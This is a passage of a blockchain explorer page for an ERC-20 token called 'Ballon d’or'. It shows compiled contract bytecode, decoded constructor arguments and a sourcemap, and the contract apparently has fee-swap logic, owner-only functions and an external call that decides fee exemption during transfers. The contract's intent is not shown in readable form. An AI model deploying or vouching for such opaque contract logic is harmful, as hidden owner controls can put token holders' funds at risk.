c029083905f818181858888f19350505050158015610fa8573d5f803e3d5ffd5b5050505050565b5f825f03610fbe57505f610540565b5f610fc9838561142d565b905082610fd68583611444565b14610d165760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b606482015260840161060c565b5f610d1683836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f0000000000008152506111f7565b5f610d1683836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610c80565b6040805160028082526060820183525f9260208301908036833701905050905030815f815181106110e2576110e2611463565b6001600160a01b03928316602091820292909201810191909152600754604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa158015611139573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061115d9190611477565b8160018151811061117057611170611463565b6001600160a01b039283166020918202929092010152600754611196913091168461089e565b60075460405163791ac94760e01b81526001600160a01b039091169063791ac947906111ce9085905f90869030904290600401611492565b5f604051808303815f87803b1580156111e5575f80fd5b505af1158015610c78573d5f803e3d5ffd5b5f81836112175760405162461bcd60e51b815260040161060c9190611223565b505f610caf8486611444565b5f6020808352835180828501525f5b8181101561124e57858101830151858201604001528201611232565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b0381168114611282575f80fd5b50565b5f8060408385031215611296575f80fd5b82356112a18161126e565b946020939093013593505050565b5f805f606084860312156112c1575f80fd5b83356112cc8161126e565b925060208401356112dc8161126e565b929592945050506040919091013590565b5f602082840312156112fd575f80fd5b8135610d168161126e565b5f8060408385031215611319575f80fd5b82356113248161126e565b915060208301358015158114611338575f80fd5b809150509250929050565b5f8060408385031215611354575f80fd5b823561135f8161126e565b915060208301356113388161126e565b600181811c9082168061138357607f821691505b6020821081036113a157634e487b7160e01b5f52602260045260245ffd5b50919050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b5f52601160045260245ffd5b80820180821115610540576105406113dc565b81810381811115610540576105406113dc565b5f60208284031215611426575f80fd5b5051919050565b8082028115828204841417610540576105406113dc565b5f8261145e57634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f60208284031215611487575f80fd5b8151610d168161126e565b5f60a082018783526020878185015260a0604085015281875180845260c08601915082890193505f5b818110156114e05784516001600160a01b0316835293830193918301916001016114bb565b50506001600160a01b0396909616606085015250505060800152939250505056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220765a4552d252d87c187c81f5586ad9c7c03a540690aa9aef755a5a125aad78ad64736f6c63430008140033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000016000000000000000000000000000000000000000000000000000000000000003e800000000000000000000000000000000000000000000000000000000000003e800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ff3f3ac5d7541ce7b3dcd19c7407e85dc73abdf700000000000000000000000000000000000000000000000000000000000001a00000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d000000000000000000000000bb6f929386e8fc4985c5e7f3ca9ab4ee1954d8a000000000000000000000000018c96a8a5373c2ed1045e019d3d14717a94d7e000000000000000000000000000000000000000000000000000000000000000012000000000000000000000000000000000000000000000000000000000000000d42616c6c6f6e2064e280996f7200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c42616c6c6f6e64e280996f720000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): Ballon d’or
Arg [1] : feeParam (tuple): System.Collections.Generic.List`1[Nethereum.ABI.FunctionEncoding.ParameterOutput]
Arg [2] : symbol_ (string): Ballond’or
Arg [3] : proVals (tuple): System.Collections.Generic.List`1[Nethereum.ABI.FunctionEncoding.ParameterOutput]
Arg [4] : decimals_ (uint8): 18

-----Encoded View---------------
15 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000160
Arg [1] : 00000000000000000000000000000000000000000000000000000000000003e8
Arg [2] : 00000000000000000000000000000000000000000000000000000000000003e8
Arg [3] : 0000000000000000000000000000000000000000000000000000000000000000
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000000
Arg [5] : 000000000000000000000000ff3f3ac5d7541ce7b3dcd19c7407e85dc73abdf7
Arg [6] : 00000000000000000000000000000000000000000000000000000000000001a0
Arg [7] : 0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d
Arg [8] : 000000000000000000000000bb6f929386e8fc4985c5e7f3ca9ab4ee1954d8a0
Arg [9] : 00000000000000000000000018c96a8a5373c2ed1045e019d3d14717a94d7e00
Arg [10] : 0000000000000000000000000000000000000000000000000000000000000012
Arg [11] : 000000000000000000000000000000000000000000000000000000000000000d
Arg [12] : 42616c6c6f6e2064e280996f7200000000000000000000000000000000000000
Arg [13] : 000000000000000000000000000000000000000000000000000000000000000c
Arg [14] : 42616c6c6f6e64e280996f720000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

33418:6215:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;24904:100;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;28185:210;;;;;;;;;;-1:-1:-1;28185:210:0;;;;;:::i;:::-;;:::i;:::-;;;1188:14:1;;1181:22;1163:41;;1151:2;1136:18;28185:210:0;1023:187:1;25989:108:0;;;;;;;;;;-1:-1:-1;26077:12:0;;25989:108;;;1361:25:1;;;1349:2;1334:18;25989:108:0;1215:177:1;34539:25:0;;;;;;;;;;-1:-1:-1;34539:25:0;;;;-1:-1:-1;;;;;34539:25:0;;;;;;-1:-1:-1;;;;;1561:32:1;;;1543:51;;1531:2;1516:18;34539:25:0;1397:203:1;34474:25:0;;;;;;;;;;;;;;;;26587:454;;;;;;;;;;-1:-1:-1;26587:454:0;;;;;:::i;:::-;;:::i;34206:20::-;;;;;;;;;;;;;;;;33809:26;;;;;;;;;;-1:-1:-1;33809:26:0;;;;-1:-1:-1;;;;;33809:26:0;;;24736:100;;;;;;;;;;-1:-1:-1;24819:9:0;;24736:100;;24819:9;;;;2208:36:1;;2196:2;2181:18;24736:100:0;2066:184:1;27730:300:0;;;;;;;;;;-1:-1:-1;27730:300:0;;;;;:::i;:::-;;:::i;33953:28::-;;;;;;;;;;;;;;;;33470:39;;;;;;;;;;-1:-1:-1;33470:39:0;;;;-1:-1:-1;;;;;33470:39:0;;;25516:177;;;;;;;;;;-1:-1:-1;25516:177:0;;;;;:::i;:::-;-1:-1:-1;;;;;25667:18:0;25635:7;25667:18;;;;;;;;;;;;25516:177;17695:148;;;;;;;;;;;;;:::i;:::-;;34358:26;;;;;;;;;;;;;;;;16613:79;;;;;;;;;;-1:-1:-1;16678:6:0;;-1:-1:-1;;;;;16678:6:0;16613:79;;33917:29;;;;;;;;;;;;;;;;25812:104;;;;;;;;;;;;;:::i;33644:48::-;;;;;;;;;;-1:-1:-1;33644:48:0;;;;;:::i;:::-;;;;;;;;;;;;;;;;30010:400;;;;;;;;;;-1:-1:-1;30010:400:0;;;;;:::i;:::-;;:::i;25227:216::-;;;;;;;;;;-1:-1:-1;25227:216:0;;;;;:::i;:::-;;:::i;38653:180::-;;;;;;;;;;-1:-1:-1;38653:180:0;;;;;:::i;:::-;;:::i;27112:201::-;;;;;;;;;;-1:-1:-1;27112:201:0;;;;;:::i;:::-;-1:-1:-1;;;;;27278:18:0;;;27246:7;27278:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;27112:201;16847:281;;;;;;;;;;-1:-1:-1;16847:281:0;;;;;:::i;:::-;;:::i;38845:197::-;;;;;;;;;;;;;:::i;24904:100::-;24958:13;24991:5;24984:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;24904:100;:::o;28185:210::-;28304:4;28326:39;11761:10;28349:7;28358:6;28326:8;:39::i;:::-;-1:-1:-1;28383:4:0;28185:210;;;;;:::o;26587:454::-;26727:4;26744:36;26754:6;26762:9;26773:6;26744:9;:36::i;:::-;26791:220;26814:6;11761:10;26862:138;26918:6;26862:138;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;26862:19:0;;;;;;:11;:19;;;;;;;;11761:10;26862:33;;;;;;;;;;:37;:138::i;:::-;26791:8;:220::i;:::-;-1:-1:-1;27029:4:0;26587:454;;;;;:::o;27730:300::-;11761:10;27845:4;27939:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;27939:34:0;;;;;;;;;;27845:4;;27867:133;;27917:7;;27939:50;;27978:10;27939:38;:50::i;17695:148::-;17265:6;;-1:-1:-1;;;;;17265:6:0;11761:10;17265:22;17257:67;;;;-1:-1:-1;;;17257:67:0;;;;;;;:::i;:::-;;;;;;;;;17786:6:::1;::::0;17765:40:::1;::::0;17802:1:::1;::::0;-1:-1:-1;;;;;17786:6:0::1;::::0;17765:40:::1;::::0;17802:1;;17765:40:::1;17816:6;:19:::0;;-1:-1:-1;;;;;;17816:19:0::1;::::0;;17695:148::o;25812:104::-;25868:13;25901:7;25894:14;;;;;:::i;30010:400::-;30130:4;30152:228;11761:10;30202:7;30224:145;30281:15;30224:145;;;;;;;;;;;;;;;;;11761:10;30224:25;;;;:11;:25;;;;;;;;-1:-1:-1;;;;;30224:34:0;;;;;;;;;;;;:38;:145::i;25227:216::-;25349:4;25371:42;11761:10;25395:9;25406:6;25371:9;:42::i;38653:180::-;17265:6;;-1:-1:-1;;;;;17265:6:0;11761:10;17265:22;17257:67;;;;-1:-1:-1;;;17257:67:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;38738:26:0;::::1;;::::0;;;:17:::1;:26;::::0;;;;;;;;:37;;-1:-1:-1;;38738:37:0::1;::::0;::::1;;::::0;;::::1;::::0;;;38791:34;;1163:41:1;;;38791:34:0::1;::::0;1136:18:1;38791:34:0::1;;;;;;;38653:180:::0;;:::o;16847:281::-;17265:6;;-1:-1:-1;;;;;17265:6:0;11761:10;17265:22;17257:67;;;;-1:-1:-1;;;17257:67:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;16950:22:0;::::1;16928:110;;;::::0;-1:-1:-1;;;16928:110:0;;4502:2:1;16928:110:0::1;::::0;::::1;4484:21:1::0;4541:2;4521:18;;;4514:30;4580:34;4560:18;;;4553:62;-1:-1:-1;;;4631:18:1;;;4624:36;4677:19;;16928:110:0::1;4300:402:1::0;16928:110:0::1;17075:6;::::0;17054:38:::1;::::0;-1:-1:-1;;;;;17054:38:0;;::::1;::::0;17075:6:::1;::::0;17054:38:::1;::::0;17075:6:::1;::::0;17054:38:::1;17103:6;:17:::0;;-1:-1:-1;;;;;;17103:17:0::1;-1:-1:-1::0;;;;;17103:17:0;;;::::1;::::0;;;::::1;::::0;;16847:281::o;38845:197::-;17265:6;;-1:-1:-1;;;;;17265:6:0;11761:10;17265:22;17257:67;;;;-1:-1:-1;;;17257:67:0;;;;;;;:::i;:::-;26077:12;;38904:14:::1;:30:::0;26077:12;;38945:13:::1;:29:::0;38988:11:::1;::::0;-1:-1:-1;;;;;38988:11:0;;::::1;38976:24;::::0;;;:11:::1;:24;::::0;;;;;;;39001:15;;;;::::1;38976:41:::0;;;;;;-1:-1:-1;;38976:58:0;;38845:197::o;30848:380::-;-1:-1:-1;;;;;30984:19:0;;30976:68;;;;-1:-1:-1;;;30976:68:0;;4909:2:1;30976:68:0;;;4891:21:1;4948:2;4928:18;;;4921:30;4987:34;4967:18;;;4960:62;-1:-1:-1;;;5038:18:1;;;5031:34;5082:19;;30976:68:0;4707:400:1;30976:68:0;-1:-1:-1;;;;;31063:21:0;;31055:68;;;;-1:-1:-1;;;31055:68:0;;5314:2:1;31055:68:0;;;5296:21:1;5353:2;5333:18;;;5326:30;5392:34;5372:18;;;5365:62;-1:-1:-1;;;5443:18:1;;;5436:32;5485:19;;31055:68:0;5112:398:1;31055:68:0;-1:-1:-1;;;;;31136:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;31188:32;;1361:25:1;;;31188:32:0;;1334:18:1;31188:32:0;;;;;;;;30848:380;;;:::o;36856:1789::-;-1:-1:-1;;;;;36991:23:0;;;;:55;;-1:-1:-1;;;;;;37018:28:0;;37039:6;37018:28;36991:55;36990:85;;;-1:-1:-1;37064:11:0;;36990:85;:135;;;;37082:43;37107:6;37115:9;37082:24;:43::i;:::-;36986:682;;;37156:42;37172:6;37180:9;37191:6;37156:15;:42::i;:::-;36856:1789;;;:::o;36986:682::-;37284:14;;37274:6;:24;;37248:112;;;;-1:-1:-1;;;37248:112:0;;5717:2:1;37248:112:0;;;5699:21:1;5756:2;5736:18;;;5729:30;5795:34;5775:18;;;5768:62;-1:-1:-1;;;5846:18:1;;;5839:41;5897:19;;37248:112:0;5515:407:1;37248:112:0;37392:11;;-1:-1:-1;;;;;37379:24:0;;;37392:11;;37379:24;37375:282;;-1:-1:-1;;;;;25667:18:0;;37424:27;25667:18;;;;;;;;;;;37555:13;;37523:28;37545:6;25667:18;37523:28;:::i;:::-;:45;;37493:148;;;;-1:-1:-1;;;37493:148:0;;6391:2:1;37493:148:0;;;6373:21:1;6430:2;6410:18;;;6403:30;6469:31;6449:18;;;6442:59;6518:18;;37493:148:0;6189:353:1;37493:148:0;37405:252;37375:282;37703:4;37669:13;25667:18;;;;;;;;;;;37746:5;;37767:10;;37737:14;;;;;-1:-1:-1;;;37767:10:0;;;;37766:11;:22;;;;;37781:7;37766:22;:51;;;;-1:-1:-1;;;;;;37793:24:0;;;;;;:16;:24;;;;;;;;37792:25;37766:51;37762:313;;;37834:10;:17;;-1:-1:-1;;;;37834:17:0;-1:-1:-1;;;37834:17:0;;;37884:5;37908:11;;37904:127;;37986:10;;37940:75;;37977:7;;-1:-1:-1;;;;;37986:10:0;37940:14;:75::i;:::-;-1:-1:-1;38045:10:0;:18;;-1:-1:-1;;;;38045:18:0;;;37762:313;38105:10;;-1:-1:-1;;;;;38130:28:0;;38087:14;38130:28;;;:17;:28;;;;;;38105:10;-1:-1:-1;;;38105:10:0;;;;;38104:11;;38130:28;;:57;;-1:-1:-1;;;;;;38162:25:0;;;;;;:17;:25;;;;;;;;38130:57;38126:117;;;-1:-1:-1;38226:5:0;38126:117;38261:9;38257:328;;;38287:14;38304:32;38331:4;38304:22;38315:10;;38304:6;:10;;:22;;;;:::i;:::-;:26;;:32::i;:::-;-1:-1:-1;;;;;38355:27:0;;;;;;:16;:27;;;;;;38287:49;;-1:-1:-1;38355:27:0;;38351:122;;;38424:33;38452:4;38424:23;38435:11;;38424:6;:10;;:23;;;;:::i;:33::-;38415:42;;38351:122;38496:18;:6;38507;38496:10;:18::i;:::-;38487:27;;38527:46;38543:6;38559:4;38566:6;38527:15;:46::i;:::-;38272:313;38257:328;38595:42;38611:6;38619:9;38630:6;38595:15;:42::i;:::-;36969:1676;;;36856:1789;;;:::o;3425:226::-;3545:7;3581:12;3573:6;;;;3565:29;;;;-1:-1:-1;;;3565:29:0;;;;;;;;:::i;:::-;-1:-1:-1;3605:9:0;3617:5;3621:1;3617;:5;:::i;:::-;3605:17;3425:226;-1:-1:-1;;;;;3425:226:0:o;3896:181::-;3954:7;;3986:5;3990:1;3986;:5;:::i;:::-;3974:17;;4015:1;4010;:6;;4002:46;;;;-1:-1:-1;;;4002:46:0;;6882:2:1;4002:46:0;;;6864:21:1;6921:2;6901:18;;;6894:30;6960:29;6940:18;;;6933:57;7007:18;;4002:46:0;6680:351:1;4002:46:0;4068:1;3896:181;-1:-1:-1;;;3896:181:0:o;36515:300::-;-1:-1:-1;;;;;36627:28:0;;36602:4;36627:28;;;:17;:28;;;;;;;;;:57;;-1:-1:-1;;;;;;36659:25:0;;;;;;:17;:25;;;;;;;;36627:57;:180;;;-1:-1:-1;36726:19:0;;36707:96;;-1:-1:-1;;;36707:96:0;;-1:-1:-1;;;;;7266:15:1;;;36707:96:0;;;7248:34:1;7318:15;;;7298:18;;;7291:43;36806:1:0;;36726:19;;36707:62;;7183:18:1;;36707:96:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;:100;36619:188;36515:300;-1:-1:-1;;;36515:300:0:o;28889:610::-;-1:-1:-1;;;;;29029:20:0;;29021:70;;;;-1:-1:-1;;;29021:70:0;;7736:2:1;29021:70:0;;;7718:21:1;7775:2;7755:18;;;7748:30;7814:34;7794:18;;;7787:62;-1:-1:-1;;;7865:18:1;;;7858:35;7910:19;;29021:70:0;7534:401:1;29021:70:0;-1:-1:-1;;;;;29110:23:0;;29102:71;;;;-1:-1:-1;;;29102:71:0;;8142:2:1;29102:71:0;;;8124:21:1;8181:2;8161:18;;;8154:30;8220:34;8200:18;;;8193:62;-1:-1:-1;;;8271:18:1;;;8264:33;8314:19;;29102:71:0;7940:399:1;29102:71:0;29266:108;29302:6;29266:108;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;29266:17:0;;:9;:17;;;;;;;;;;;;:108;:21;:108::i;:::-;-1:-1:-1;;;;;29246:17:0;;;:9;:17;;;;;;;;;;;:128;;;;29408:20;;;;;;;:32;;29433:6;29408:24;:32::i;:::-;-1:-1:-1;;;;;29385:20:0;;;:9;:20;;;;;;;;;;;;:55;;;;29456:35;1361:25:1;;;29385:20:0;;29456:35;;;;;;1334:18:1;29456:35:0;1215:177:1;36212:283:0;36314:21;36346:28;36367:6;36346:20;:28::i;:::-;36376:18;36397:41;:21;36423:14;36397:25;:41::i;:::-;36449:38;;36376:62;;-1:-1:-1;;;;;;36449:26:0;;;:38;;;;;36376:62;;36449:38;;;;36376:62;36449:26;:38;;;;;;;;;;;;;;;;;;;;;36278:217;;36212:283;;:::o;4336:471::-;4394:7;4639:1;4644;4639:6;4635:47;;-1:-1:-1;4669:1:0;4662:8;;4635:47;4694:9;4706:5;4710:1;4706;:5;:::i;:::-;4694:17;-1:-1:-1;4739:1:0;4730:5;4734:1;4694:17;4730:5;:::i;:::-;:10;4722:56;;;;-1:-1:-1;;;4722:56:0;;8941:2:1;4722:56:0;;;8923:21:1;8980:2;8960:18;;;8953:30;9019:34;8999:18;;;8992:62;-1:-1:-1;;;9070:18:1;;;9063:31;9111:19;;4722:56:0;8739:397:1;6299:132:0;6357:7;6384:39;6388:1;6391;6384:39;;;;;;;;;;;;;;;;;:3;:39::i;5689:136::-;5747:7;5774:43;5778:1;5781;5774:43;;;;;;;;;;;;;;;;;:3;:43::i;39048:582::-;39202:16;;;39216:1;39202:16;;;;;;;;39178:21;;39202:16;;;;;;;;;;-1:-1:-1;39202:16:0;39178:40;;39247:4;39229;39234:1;39229:7;;;;;;;;:::i;:::-;-1:-1:-1;;;;;39229:23:0;;;:7;;;;;;;;;;:23;;;;39264:15;;:22;;;-1:-1:-1;;;39264:22:0;;;;:15;;;;;:20;;:22;;;;;39229:7;;39264:22;;;;;:15;:22;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;39254:4;39259:1;39254:7;;;;;;;;:::i;:::-;-1:-1:-1;;;;;39254:32:0;;;:7;;;;;;;;;:32;39329:15;;39297:62;;39314:4;;39329:15;39347:11;39297:8;:62::i;:::-;39398:15;;:224;;-1:-1:-1;;;39398:224:0;;-1:-1:-1;;;;;39398:15:0;;;;:66;;:224;;39479:11;;39398:15;;39549:4;;39576;;39596:15;;39398:224;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6927:312;7047:7;7082:12;7075:5;7067:28;;;;-1:-1:-1;;;7067:28:0;;;;;;;;:::i;:::-;-1:-1:-1;7106:9:0;7118:5;7122:1;7118;:5;:::i;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:131::-;-1:-1:-1;;;;;642:31:1;;632:42;;622:70;;688:1;685;678:12;622:70;567:131;:::o;703:315::-;771:6;779;832:2;820:9;811:7;807:23;803:32;800:52;;;848:1;845;838:12;800:52;887:9;874:23;906:31;931:5;906:31;:::i;:::-;956:5;1008:2;993:18;;;;980:32;;-1:-1:-1;;;703:315:1:o;1605:456::-;1682:6;1690;1698;1751:2;1739:9;1730:7;1726:23;1722:32;1719:52;;;1767:1;1764;1757:12;1719:52;1806:9;1793:23;1825:31;1850:5;1825:31;:::i;:::-;1875:5;-1:-1:-1;1932:2:1;1917:18;;1904:32;1945:33;1904:32;1945:33;:::i;:::-;1605:456;;1997:7;;-1:-1:-1;;;2051:2:1;2036:18;;;;2023:32;;1605:456::o;2488:247::-;2547:6;2600:2;2588:9;2579:7;2575:23;2571:32;2568:52;;;2616:1;2613;2606:12;2568:52;2655:9;2642:23;2674:31;2699:5;2674:31;:::i;2740:416::-;2805:6;2813;2866:2;2854:9;2845:7;2841:23;2837:32;2834:52;;;2882:1;2879;2872:12;2834:52;2921:9;2908:23;2940:31;2965:5;2940:31;:::i;:::-;2990:5;-1:-1:-1;3047:2:1;3032:18;;3019:32;3089:15;;3082:23;3070:36;;3060:64;;3120:1;3117;3110:12;3060:64;3143:7;3133:17;;;2740:416;;;;;:::o;3161:388::-;3229:6;3237;3290:2;3278:9;3269:7;3265:23;3261:32;3258:52;;;3306:1;3303;3296:12;3258:52;3345:9;3332:23;3364:31;3389:5;3364:31;:::i;:::-;3414:5;-1:-1:-1;3471:2:1;3456:18;;3443:32;3484:33;3443:32;3484:33;:::i;3554:380::-;3633:1;3629:12;;;;3676;;;3697:61;;3751:4;3743:6;3739:17;3729:27;;3697:61;3804:2;3796:6;3793:14;3773:18;3770:38;3767:161;;3850:10;3845:3;3841:20;3838:1;3831:31;3885:4;3882:1;3875:15;3913:4;3910:1;3903:15;3767:161;;3554:380;;;:::o;3939:356::-;4141:2;4123:21;;;4160:18;;;4153:30;4219:34;4214:2;4199:18;;4192:62;4286:2;4271:18;;3939:356::o;5927:127::-;5988:10;5983:3;5979:20;5976:1;5969:31;6019:4;6016:1;6009:15;6043:4;6040:1;6033:15;6059:125;6124:9;;;6145:10;;;6142:36;;;6158:18;;:::i;6547:128::-;6614:9;;;6635:11;;;6632:37;;;6649:18;;:::i;7345:184::-;7415:6;7468:2;7456:9;7447:7;7443:23;7439:32;7436:52;;;7484:1;7481;7474:12;7436:52;-1:-1:-1;7507:16:1;;7345:184;-1:-1:-1;7345:184:1:o;8344:168::-;8417:9;;;8448;;8465:15;;;8459:22;;8445:37;8435:71;;8486:18;;:::i;8517:217::-;8557:1;8583;8573:132;;8627:10;8622:3;8618:20;8615:1;8608:31;8662:4;8659:1;8652:15;8690:4;8687:1;8680:15;8573:132;-1:-1:-1;8719:9:1;;8517:217::o;9273:127::-;9334:10;9329:3;9325:20;9322:1;9315:31;9365:4;9362:1;9355:15;9389:4;9386:1;9379:15;9405:251;9475:6;9528:2;9516:9;9507:7;9503:23;9499:32;9496:52;;;9544:1;9541;9534:12;9496:52;9576:9;9570:16;9595:31;9620:5;9595:31;:::i;9661:980::-;9923:4;9971:3;9960:9;9956:19;10002:6;9991:9;9984:25;10028:2;10066:6;10061:2;10050:9;10046:18;10039:34;10109:3;10104:2;10093:9;10089:18;10082:31;10133:6;10168;10162:13;10199:6;10191;10184:22;10237:3;10226:9;10222:19;10215:26;;10276:2;10268:6;10264:15;10250:29;;10297:1;10307:195;10321:6;10318:1;10315:13;10307:195;;;10386:13;;-1:-1:-1;;;;;10382:39:1;10370:52;;10477:15;;;;10442:12;;;;10418:1;10336:9;10307:195;;;-1:-1:-1;;;;;;;10558:32:1;;;;10553:2;10538:18;;10531:60;-1:-1:-1;;;10622:3:1;10607:19;10600:35;10519:3;9661:980;-1:-1:-1;;;9661:980:1:o

Swarm Source

ipfs://765a4552d252d87c187c81f5586ad9c7c03a540690aa9aef755a5a125aad78ad
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.